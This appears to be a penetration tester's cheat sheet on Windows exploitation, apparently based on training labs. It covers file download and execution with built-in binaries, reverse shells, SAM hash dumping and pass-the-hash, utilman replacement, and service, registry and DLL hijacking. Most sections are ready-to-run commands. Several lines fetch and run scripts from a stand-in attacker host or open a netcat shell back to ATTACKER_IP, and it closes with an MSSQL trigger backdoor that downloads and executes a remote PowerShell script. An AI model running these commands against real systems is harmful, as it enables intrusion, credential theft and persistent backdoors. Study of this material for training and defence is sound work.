2. Windows Exploitation

LOLBAS

Living Off the Land Binaries And Scripts

Uses Microsoft-signed and built-in tools used as Living Off the Land techniques, including binaries, scripts, and libraries.

https://lolbas-project.github.io/#

Downloading files to the Victim Machine

iwr

iwr -uri http://192.168.12.10 -outfile file

Certutil

certutil -URLcache -split -f http://Attacker_IP/payload.exe C:\\Windows\\Temp\\payload.exe

BITSAdmin

C:\\Users\\thm>bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\\Users\\thm\\Desktop\\payload.exe

FindStr

C:\\Users\\thm>findstr /V dummystring \\\\MachineName\\ShareFolder\\test.exe > c:\\Windows\\Temp\\test.exe

Invoke-WebRequest

Invoke-WebRequest $myDownloadUrl -OutFile c:\file.ext

Executing Files

explorer.exe

• C:\Windows\explorer.exe

• C:\Windows\SysWOW64\explorer.exe

C:\\Users\\thm> explorer.exe /root,"C:\\Windows\\System32\\calc.exe"

wmic

C:\\Users\\thm>wmic.exe process call create calc

Rundll32

• C:\Windows\System32\rundll32.exe

• C:\Windows\SysWOW64\rundll32.exe

C:\\Users\\thm> rundll32.exe javascript:"\\..\\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://AttackBox_IP/script.ps1');");

Bypassing Application Whitelists

Regsvr32

regsvr32.exe binary can also be used to execute arbitrary binaries and bypass the Windows Application Whitelisting

• C:\Windows\System32\regsvr32.exe

• C:\Windows\SysWOW64\regsvr32.exe

C:\\Users\\thm> c:\\Windows\\System32\\regsvr32.exe c:\\Users\\thm\\Downloads\\live0fftheland.dll

C:\\Users\\thm> c:\\Windows\\System32\\regsvr32.exe /s /n /u /i:<http://example.com/file.sct> Downloads\\live0fftheland.dll

Bash

If the machine has WSL installed, we can execute bash.exe -c "path-to-payload" to run any unsigned payload.

No PowerShell

PowerLessShell is a Python-based tool that generates malicious code to run on a target machine without showing an instance of the PowerShell process. PowerLessShell relies on abusing the Microsoft Build Engine (MSBuild), a platform for building Windows applications, to execute remote code.

user@machine$ git clone <https://github.com/Mr-Un1k0d3r/PowerLessShell.git>

user@machine$ python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

Spawning an admin shell

msfvenom

If we can execute command with admin privileges, we can use msfvenom to generate a reverse shell, upload it to the victim and execute it.

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=53 -f exe -o rev.exe

This reverse shell can be caught using netcat or metasploit’s multi/handler

RDP

• If RDP is available we can add a low privileged user to the Administrator group and spawn an admin prompt via the GUI

> net localgroup administrator eviluser /add

Connecting from Kali to Windows

$ winexe -U 'admin%password123' //192.168.1.2 cmd.exe
$ winexe -U 'admin%password123' --system //192.168.1.2 cmd.exe # if the user is admin

Escalating from Admin to System

To escalate from Administator user to SYSTEM user, we can use PsExec tool from Windows Sysinternals

> .\\PsExec64.exe -accepteula -i -s C:\\PrivEsc\\rev.exe

Checking Files

Like Linux, Windows files has permissions. We can check them with icacls

C:\\> icacls c:\\tasks\\schtask.bat
c:\\tasks\\schtask.bat NT AUTHORITY\\SYSTEM:(I)(F)
                    BUILTIN\\Administrators:(I)(F)
                    BUILTIN\\Users:(I)(F)

• F - Full access

• M Modify access

• RX - Read and execute access

• R - Read-only access

• W - Write-only access

Privilege Escalation

Abusing Group Membership

Account Operators

• Allows creating non administrator accounts and groups on the domain

• Allows logging in to the DC locally

Server Operators

This membership allows users to configure Domain Controllers with the following privileges:

• Allows logging in to the DC locally

• Back up files and directories

• Change the system time

• Change the time zone

• Force shutdown from a remote system

• Restore files and directories

• Shut down the system

Backup Operators

As with Server Operators membership, we can access the DC01 file system if we belong to Backup Operators

Abusing Privileges

Checking your privileges

whoami /priv

SeBackup/SeRestore

The SeBackup and SeRestore privileges allow users to read and write to any file in the system, ignoring any DACL in place.

To backup the SAM and SYSTEM hashes

C:\\> reg save hklm\\system C:\\Users\\THMBackup\\system.hive
The operation completed successfully.

C:\\> reg save hklm\\sam C:\\Users\\THMBackup\\sam.hive
The operation completed successfully.

Dump the admin hash with impacket

user@attackerpc$ python3.9 /opt/impacket/examples/secretsdump.py -sam sam.hive -system system.hive LOCALImpacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

PTH with impacket

user@attackerpc$ python3.9 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:13a04cdcf3f7ec41264e568127c5ca94 administrator@10.10.4.105Impacket v0.9.24.dev1+20210704.162046.29ad5792 - Copyright 2021 SecureAuth Corporation

SeTakeOwnership

The SeTakeOwnership privilege allows a user to take ownership of any object on the system, including files and registry keys

C:\\> takeown /f C:\\Windows\\System32\\Utilman.exe

SUCCESS: The file (or folder): "C:\\Windows\\System32\\Utilman.exe" now owned by user "WINPRIVESC2\\thmtakeownership".

Being the owner of a file doesn't necessarily mean that you have privileges over it, but being the owner you can assign yourself any privileges you need. To give your user full permissions over utilman.exe you can use the following command:

C:\\> icacls C:\\Windows\\System32\\Utilman.exe /grant THMTakeOwnership:F
processed file: Utilman.exe
Successfully processed 1 files; Failed processing 0 files

After this, we will replace utilman.exe with a copy of cmd.exe:

C:\\Windows\\System32\\> copy cmd.exe utilman.exe
        1 file(s) copied.

Trigger utilman by locking the screen, and clicking on Ease of Access

SeImpersonate/SeAssignPrimaryToken

These privileges allow a process to impersonate other users and act on their behalf. Impersonation usually consists of being able to spawn a process or thread under the security context of another user.

If we manage to take control of a process with SeImpersonate or SeAssignPrimaryToken privileges, we can impersonate any user connecting and authenticating to that process.

LOCAL SERVICE and NETWORK SERVICE ACCOUNTS already have such privileges.

1. Spawn a process so that users can connect and authenticate to it for impersonation to occur.

2. Find a way to force privileged users to connect and authenticate to the spawned malicious process.

Use RogueWinRM exploit to accomplish both conditions.

If WinRM service isn't running on the victim server, an attacker can start a fake WinRM service on port 5985 and catch the authentication attempt made by the BITS service when starting. If the connecting account has SeImpersonate privileges, he can execute any command on behalf of the connecting user, which is SYSTEM.

Starting RogueWinRM

c:\\tools\\RogueWinRM\\RogueWinRM.exe -p "C:\\tools\\nc64.exe" -a "-e cmd.exe ATTACKER_IP 4442"

Service Exploits

Insecure Service Properties

If services they are being run with SYSTEM level privileges and are misconfigured, we can try to exploit them

> sc.exe qc <name> # query the configuration of the service

> sc.exe query <name> # query the status of the service

> sc.exe config <name> <option>= <value> # modify the configuration of the service

> net start/stop <name> # Start/Stop the service

• Useful permissions

  • SERVICE_QUERY_CONFIG

  • SERVICE_QUERY_STATUS

  • SERVICE_STOP

  • SERVICE_START

• Dangerous Permissions

  • SERVICE_CHANGE_CONFIG

    • If the service is running as SYSTEM and you can change the config, you can change the executable the service uses to our own

    • HOWEVER, you must be able to restart the service with SERVICE_STOP/ SERVICE_START

    • If not you have to restart the entire machine, but that could reset the exploit

  • SERVICE_ALL_ACCESS

Example

When we run winPEAS, we see that daclsvc is modifiable

Running checks on it, we see that it runs as system, and has a Binary path

We can therefore change the binary path to our own executable, and restart the service to run our payload as system

> sc config daclsvc binpath= "\\"C:\\Path\\to\\exploit.exe\\""
> net start daclsvc

Unquoted Service Path

• Executables in windows can be run without their extensions, e.g. whoami.exe can be executed with whoami

• This leads to ambiguity when using absolute paths that are unquoted and contain spaces

Example

> C:\\Program File\\Some Dir\\SomeProg.exe

This could be interpreted as

1. C:\\Program Files\\Some Dir\\SomProg.exe with no arguments

2. C:\\Program.exe with File\\Some and Dir\\SomeProg.exe as arguments.

3. C:\\Program File\\Some.exe with Dir\\SomeProg.exe as arguments

Windows resolves this ambiguity by checking all possible combinations

To exploit this, we can create a file called C:\\Program.exethat takes in two inputs, and this command will execute our payload

Weak Registry Permissions

• Windows Registry stores entries for each service

• If the Registry entries have misconfigured ACLs, we can change the service configurations without directly changing the service

Example

winPEAS shows that we can change the registry of a service called regsvc

We then run reg query to see what values we can change in the registry, and see that we can change the ImagePath to point to our payload.

ObjectName=LocalSystem also tells us that the service should execute with system level privileges.

We modify the registry for ImagePath as such, and start the service

> reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\\Path\\to\\payload.exe

> net start regsvc

Insecure Service Executable

• If the binary used by the service is modifiable by the user, we can simply replace it with our our payload to be executed

Example

filepermsvc service has an executable that can be modified by anyone.

If we replace filepermservice.exe with our own payload and start the service, we can execute our payload

DLL Hijacking

• If a DLL is loaded with an absolute path, we can escalate privileges if that DLL is modifiable

• If a DLL is missing from the system, and we can write to the PATH that Windows searches for to load libraries, we can load our own library

Example

We see that C:\\Temp directory is writable, and it’s also in the PATH variable. This means that Windows will search for libraries present in C:\\Temp and load them if it’s there.

We then need to find a service that we can stop/start, find what libraries the service is using, and create a payload with the same name in C:/Temp

In this example, dllsvc service executes dllhijackservice.exe

We then need to analyze what libraries dllhijackservice.exe is loaded when it’s executed. We can do this with Procmon.exe

Now when we execute dllhijackservice.exe, we see a number NAME NOT FOUND associated with hijackme.dll. On the last 4th line, we can see it check in the directory C:\\Temp, which know it’s writable from before.

Now all we need to do create our payload C:\\Temp\\hijack.dll, and our payload will be executed.

Registry Exploits

AutoRuns

• Windows can be configured to run commands at startup with elevated privileges

• These AutoRuns are configured in the Registry

• If we can write to an AutoRun executable and restart the system, we can escalate privileges

Example

Running winPEAS, we see that C:\\Program File\\Autorun Program\\program.exe is writable by everyone. we can overwrite this file with our payload, restart the system to execute it.

AlwaysInstallElevated

• MSI files are package files used to install applications

• MSI files run with permissions of the user executing it

• Windows allows these installers to be run with elevated privileges with a prompt

• For this to happen, two AlwaysInstallElevated needs to be set to 1 in

  • HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer

  • HKCU\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer

• We can generate a malicious MSI file containing our payload using msfvenom

When running winPEAS, we see that its one of the things thats being checked

Exploiting Scheduled Tasks

• Like Linux cronjobs, Windows can be configured to run specific tasks periodically, or triggered by a certain event

• Tasks usually run at the privilege level of the user that created it, but administrators can configure them to run as other users, including SYSTEM

• If we can modify these scripts, we can run commands as admin

# Querying for scheduled tasks
> schtask /query /fo LIST /v

# In Powershell
PS> Get-ScheduledTask | where {$_.TaskPath -notLike "\\Microsoft*"} | ft TaskName,TaskPath,State

Insecure GUI Apps

• Users can be granted permissions to run some GUI apps with admin privileges

• Using these GUI apps, we may spawn command prompts which will inherit these admin privileges

Example

Check if the app is running as admin using the command

> tasklist /V | findstr mspaint.exe

We see that mspaint is running as admin. We then navigate to mspaint and open up a command prompt. We do this by going to File -> Open -> file://c:/windows/system32/cmd.exe

MSSQL

Triggers in MSSQL allow you to bind actions to be performed when specific events occur in the database.

Before creating the trigger, we must first reconfigure a few things on the database. First, we need to enable the xp_cmdshell stored procedure. xp_cmdshell is a stored procedure that is provided by default in any MSSQL installation and allows you to run commands directly in the system's console but comes disabled by default.

Enabling xp_cmdshell

sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO

Because only the system administrator can run xp_shell, we need to configure all connections to impersonate the system administrator account.

USE master

GRANT IMPERSONATE ON LOGIN::sa to [Public];

Configure the trigger on the database

USE TARGETDB

CREATE TRIGGER [sql_backdoor]
ON TARGETDB.dbo.Employees 
FOR INSERT AS

EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://ATTACKER_IP:8000/evilscript.ps1'')"';

The xp_cmdshell will download evilscript.ps from our server and execute it.